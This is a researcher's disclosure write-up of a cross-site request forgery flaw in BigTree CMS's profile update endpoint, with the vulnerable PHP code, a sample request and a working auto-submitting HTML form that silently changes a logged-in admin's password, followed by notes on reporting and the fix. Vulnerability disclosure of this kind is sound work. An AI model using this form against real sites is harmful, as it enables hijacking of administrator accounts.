This is a little explaination of the vulnerability and how to exploit it.
The vulnerability is in the account settings request, which is used to change the account name, company and password.
A normal request looks like this:
POST /site/index.php/admin/users/profile/update/ HTTP/1.1 Host: bigtree User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://bigtree/site/index.php/admin/users/profile/ Cookie: bigtree_admin[email]=admin%40admin.com; bigtree_admin[password]=%24P%24BtBKYRYkkk%2FMEvT%2F.XzNJO8j.6Z1bN%2F; PHPSESSID=iee0n5s0gu9b0ausud7hdqkql4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 44 name=Developer&password=newpassword&company=
The vulnerability exists in
<? $admin->updateProfile($_POST); $admin->growl("Users","Updated Profile"); BigTree::redirect(ADMIN_ROOT."dashboard/"); ?>
Here is clearly isn't doing any checks to prevent CSRF.
So exploiting this is very simple, you just have to lure someone who is already logged into the application is visit a page containing this code:
<html> <body> <form method="post" action="http:/bigtree/site/index.php/admin/users/profile/update/" > <input type="hidden" name="name" value="admin" /> <input type="hidden" name="password" value="newpassword" /> <input type="hidden" name="company" value="foobar" /> </form> <script> document.forms.submit() </script> </body> </html>
The values here can be changed to anything, it just automatically issues a POST request to
http:/bigtree/site/index.php/admin/users/profile/update/ with the following arguments:
Unfortunately it is reasonably intrusive because when loaded the victim will see this:
So the user will immediately know that their profile details might have changed.
So I contacted Tim Buckingham (the lead developer for BigTree CMS) about this issue yesterday (on 7th March 2015) and he replied the next day informing me that he'd fixed the issue.
You can see the fix here.
The next full releases of BigTree CMS (4.1.6 and 4.0.10) should be out next week and will incorporate this fix.
Happy Hacking :-)
Update (07/04/2015): BigTree CMS have finally released the next version (4.2) that includes the fix, you can download the latest version from here.